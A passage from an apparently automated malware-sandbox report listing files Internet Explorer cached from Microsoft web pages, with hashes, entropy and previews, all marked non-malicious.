Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\print-icon[1].pngProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced

Size (bytes): 173

Entropy (8bit): 5.970149697517944

Encrypted: false

MD5: 023F5AC6E0114AF1F781BE5D3C956385

SHA1: C166284B8541F1DE32DC5C4DEC635C296BF85C98

SHA-256: 75D637BF6B6DFF2525095D0BE7E0C90F012BB118C2EF19099AFDCBC630ADFC79

SHA-512: DAFA49056E3D3014DB392410685CC05773C09938E2E700657727928EDCFF8EA2D7C769D377539C52DA70321B94F4E8F045F565EC51BC2B701D95BB3213CC2203

Malicious: false

Preview: .PNG........IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx.b...?..0222`..jX..a5...D0.50.......k......:...X=....'..(..I.....K........ .........IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\script[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 28228

Entropy (8bit): 5.328001992404352

Encrypted: false

MD5: 62CAEEAADDE772430F6D4C6BFB57D631

SHA1: 4F599DC9B764720A6E85E06BA228595DB0959AC4

SHA-256: E2AFDBAAE33821CC0792E905C5F3BDB1EB49789C66803C39B1028FF566C765E9

SHA-512: DF5E00BE2C96EA361336C4BA529A7C288FBA65FD6ED0832DEF15CBB3989307AF7C24ED6FD4EA591E885932A7A7F947056E7116D942A3D15B6ABA8F346E534B8F

Malicious: false

Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\18-d72213[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 128007

Entropy (8bit): 5.225176216325186

Encrypted: false

MD5: 59AD05CBCCE6803FB00314310F20FC45

SHA1: F7A094F6E0E60CD5C5B20D10788AF8A8F71CFEFF

SHA-256: 55AFD02F9CA1FE1B8D3705EF8EBA7C9A8E2F0BA4B8D1AB8853A2A10FAE9E4AC8

SHA-512: 7EDCE6C4078519C8E623B5CC32F47E8033E400673F17BEDBF59A8C6DAB551705E2C33000D158CAB2C7EB164281D6C5980B81FE0F297B38AF05061F086C121D09

Malicious: false

Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

Copyright Joe Security LLC 2019 Page 31 of 47

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\51-6d3a1e[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 163522

Entropy (8bit): 5.050717299586406

Encrypted: false

MD5: 6178D19989D7964964A1CC7BED82F341

SHA1: 8B0DBA5CCCCFAC4ED390F900F85B275A5507215A

SHA-256: 3ABC05CF7FCD206115A9F2871547BE6A8649C34B2EFC0D1F77441147A5A78BC8

SHA-512: 120F92E7C4F785EADC0B000F0035E475977ECAAA4131500E3D2EE3C4CE9D1A368DB3C07D16BEB58DE46AD2F6857503A3445DFE06BEA23F59646424FFA1946F81

Malicious: false

Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 2100

Entropy (8bit): 4.112944982261013

Encrypted: false

MD5: 747A513A54BAA645775E49D4C52696D4

SHA1: D24769327CA348064544DDC259726EFBEC3DAE36

SHA-256: DFCBA2DC365A99E7DEDAEFAEE7171282F9F6AC2B928B4E99060925EE6E129BA4

SHA-512: C17A9065E6F307E4E45D5C422FE42E75F12DDA916715E7A927FF2DB9F6677249DA4B2545772594051AE2B93A47D61BC6356DE5412C9213C33C04BF018CA88509

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Copyright Joe Security LLC 2019 Page 32 of 47

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[2].ico

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon_a_eupayfgghqiai7k9sol6lg2[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors

Size (bytes): 17174

Entropy (8bit): 2.9129715116732746

Encrypted: false

MD5: 12E3DAC858061D088023B2BD48E2FA96

SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5

SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21

SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01

Malicious: false

Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\httpErrorPagesScripts[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 12105

Entropy (8bit): 5.451485481468043

Encrypted: false

MD5: 9234071287E637F85D721463C488704C

SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152

SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649

SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384

Malicious: false

Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\jquery-1.7.2.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode text, with very long lines

Size (bytes): 98400

Entropy (8bit): 5.372216343161422

Encrypted: false

MD5: C209DB8CCA8078D9F5EA3FFFC8DCBB5B

SHA1: 8F147E9F86789327CE0FC5DBB3DA27EE2E81651D

SHA-256: FDBBCC3C415BAA641E0A84E29A8E18FF9A0923458FFFED63D1AD143DCDF1AFE9

SHA-512: 34A265D2F1FC153C5A718E3871EC9F2ECCA2FEC19338DD8BFFE99D040EE975A1CDC14C9E32CB182C2E6BB9378AA379DAD9CB90BB533E663FA27B3B45C2F9DFF2

Malicious: false

Preview: /*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 3651

Entropy (8bit): 4.094801914706141

Encrypted: false

MD5: EE5C8D9FB6248C938FD0DC19370E90BD

SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4

Copyright Joe Security LLC 2019 Page 33 of 47

SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A

SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd[1].svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with no line terminators

Size (bytes): 108912

Entropy (8bit): 5.29531094760475

Encrypted: false

MD5: 35B50546931869824B2001C18D22B6BC

SHA1: BAB73DE68AA3EB6450B896FB502F5F288B872F83

SHA-256: 4B4BBAFA87644E35C133E83F8916808C7FB4B1FAEB13DC9F16862FC41200A583

SHA-512: 8FE0085E6C052FB74DD12889BF69250765F1AEF1089B91796541C854FFB8AE778987E75BD2BC570B2408F58317A94ADB1A475B9C4BC080CF3DFE6D1C458C6198

Malicious: false

Preview: @charset "utf-8";/*! mscc v0.4.1 - Copyright 2018 Microsoft Corporation */.cc-banner{position:relative;font-size:12px}.cc-banner .hide{display:none}.cc-banner a,.cc-banner div,.cc-banner span,.cc-banner svg{margin:0;padding:0;text-decoration:none}.cc-banner .cc-v-center{display:inline;vertical-align:middle;line-height:2em}.cc-banner[dir=rtl] .cc-float-left,.cc-float-right{float:right}.cc-banner[dir=rtl] .cc-float-right,.cc-float-left{float:left}.cc-banner{font-family:"Segoe UI","Helvetica Neue",Helvetica,Arial,sans-serif;color:#231f20;background:#f2f2f2;display:none;text-align:center;padding:0 1em;margin:0}@media (min-width:768px){.cc-banner{font-size:13px;padding:0 1.65em}}.cc-banner>.cc-container{text-align:left;padding:.75em 0;display:inline-block;width:100%}[dir=rtl].cc-banner>.cc-container{text-align:right}@media (min-width:1084px){.cc-banner{padding:0}.cc-banner>.cc-container{width:90%;max-width:1600px}}.cc-banner.active{display:block}.cc-banner .cc-icon{height:1.846em;width:1.84

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 3560

Entropy (8bit): 5.226312832132134

Encrypted: false

MD5: 5E9A1F4AA31D4AA60F6F899A2E45CEF8

SHA1: 460F6C21B08FA2723DBBC68613ABDF18213B2FAA

SHA-256: C87516D7DD7077EDD467F5B7B085B035CD4803ECF049670AB19DE004E270ABA8

SHA-512: 9AB7DAF8C92879019AFEBA5A8F04A593DE048233380C1A3FA071DCA0F51F9A9ACC12969C852CD8BF675744F25B4FA0A5D1EA82BB22FE6C3887FEBC797E943E86

Malicious: false

Preview: var mscc;!function(e){function t(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];x[e]&&x[e].forEach(function(e){e.apply(null,t)})}function n(e,t){x[e]?x[e].push(t):x[e]=[t]}function o(e){if(e)for(var t=0,n=document.cookie.split("; ");t<n.length;t++){var o=n[t],a=o.indexOf("="),i=o.substring(0,a);if(i===e)return o.substring(i.length+1)}return null}function a(e,t,n){var a=new Date;a.setDate(a.getDate()+n);var i=I.split("."),c=i.pop();if("localhost"==c)document.cookie=0===n?e+"="+t+";path=/":e+"="+t+";expires="+a.toUTCString()+";path=/";else for(;o(e)!==t&&0!==i.length;)c=i.pop()+"."+c,document.cookie=0===n?e+"="+t+";path=/;domain=."+c:e+"="+t+";expires="+a.toUTCString()+";path=/;domain=."+c}function i(e,t){return e.classList?e.classList.contains(t):new RegExp("(^| )"+t+"( |$)","gi").test(e.className)}function c(e,t){e.classList?e.classList.add(t):e.className+=" "+t}function s(e,t){e.classList?e.classList.remove(t):e.className=e.className.replace(new RegExp("(^|\\b)"+t.spli

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\override[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 1531

Entropy (8bit): 4.797455242405607

Encrypted: false

MD5: A570448F8E33150F5737B9A57B6D889A

SHA1: 860949A95B7598B394AA255FE06F530C3DA24E4E

SHA-256: 0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248

SHA-512: 217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC

Malicious: false

Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Size (bytes): 199457

Copyright Joe Security LLC 2019 Page 34 of 47

Entropy (8bit): 5.106344003201765

Encrypted: false

MD5: 9F0C0F80CB1D15D6EAB320BBB12660EC

SHA1: 6112834A0C86BA145528324E92ED91CBE6B95104

SHA-256: 3CD6CC18C6B5FE59BEA20FBAD928F2643B8ECCBCE5510661A5B40F0D3C8BFA2E

SHA-512: 0078A67CB549003C520F875DD9EA0AEA91AD11DB64645169F504A43D620BA529F46674F390D3F434DFC6CC8DC77F431FD88147AE6FD9C653D2531953819CC2F2

Malicious: false

Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta name="viewport" content="initial-scale=1.0, width=device-width, user-scalable=no" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Microsoft Services Agreement</title><meta name="Title" content="Microsoft Services Agreement" /><meta name="CorrelationVector" content="TTKmV8refk2wecop.1" /><meta name="Description" content="" /><meta name="MscomContentLocale" content="en-us" /><link href="https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0" rel="stylesheet" type="text/css" media="screen" /><link href="https://statics-uhf-wus.akamaized.net/statics/override.css?c=7" rel="stylesheet" type="text/css" media="screen" /><link href="https://c.s-microsoft.co

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\style[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 30000

Entropy (8bit): 5.377378427765789

Encrypted: false

MD5: 6C307038F5B5E50AA688A666B48E9F0F

SHA1: C155031E01ABC003CF473DCF5620613BF719882D

SHA-256: 3403C7B22615CE65E3454CBE95C87010DA7F456C79E2344C1C5A0A15DC30B044

SHA-512: 610D067496F1BD81A5B4902D93D0EF1242A1AAC0F2D85138E92AB63EAA94C10C26ACAC490F1257DD8D17FC090F8E263E014E05B8ACB8742A8ECEF4E77BDC4E3F

Malicious: false

Preview: .com/data/icons/New-Social-Media-Icon-Set-V11/24/facebook.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .video-twitter{width:28px;height:28px;background:url('https://cdn2.iconfinder.com/data/icons/New-Social-Media-Icon-Set-V11/24/twitter.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .play{background-position:0 -1544px}.video-button-container .captions{background-position:0 -732px}.video-button-container .video-light{background-position:0 -964px}.video-button-container .fullscreen{background-position:0 -1196px}.video-button-container .mute{background-position:0 -1660px}#video-controls{position:absolute;margin-bottom:10px;bottom:0;left:0;right:0;height:50px;opacity:0;-webkit-transition:opacity .3s;-moz-transition:opacity .3s;-o-transition:opacity .3s;-ms-transition:opacity .3s;transition:opacity .3s;background-image:-webkit-gradient(lin

C:\Users\user\AppData\Local\Temp\~DF2952A600E710646A.TMPProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 132499

Entropy (8bit): 2.67613037807218

Encrypted: false

MD5: 05A3B067D2B361F9CE36C11FEC27E78A

SHA1: 26ADF890DB8264EE548DEE2F1AB1D554AB50612F

SHA-256: 774FD9D0BA65310BE85B95DDEA8D4941170DA2AA75F94E98705DD0263A7FAC27

SHA-512: 94106FB655D3290C7CC6FE32F409CFA661A040B215142B986D6A4F172212CC1ED8A467C745D0873686B393B2FDF0729FD70673751F4EE198C35863FAD21C5A08

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF627A96170C75B844.TMPProcess: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 13077
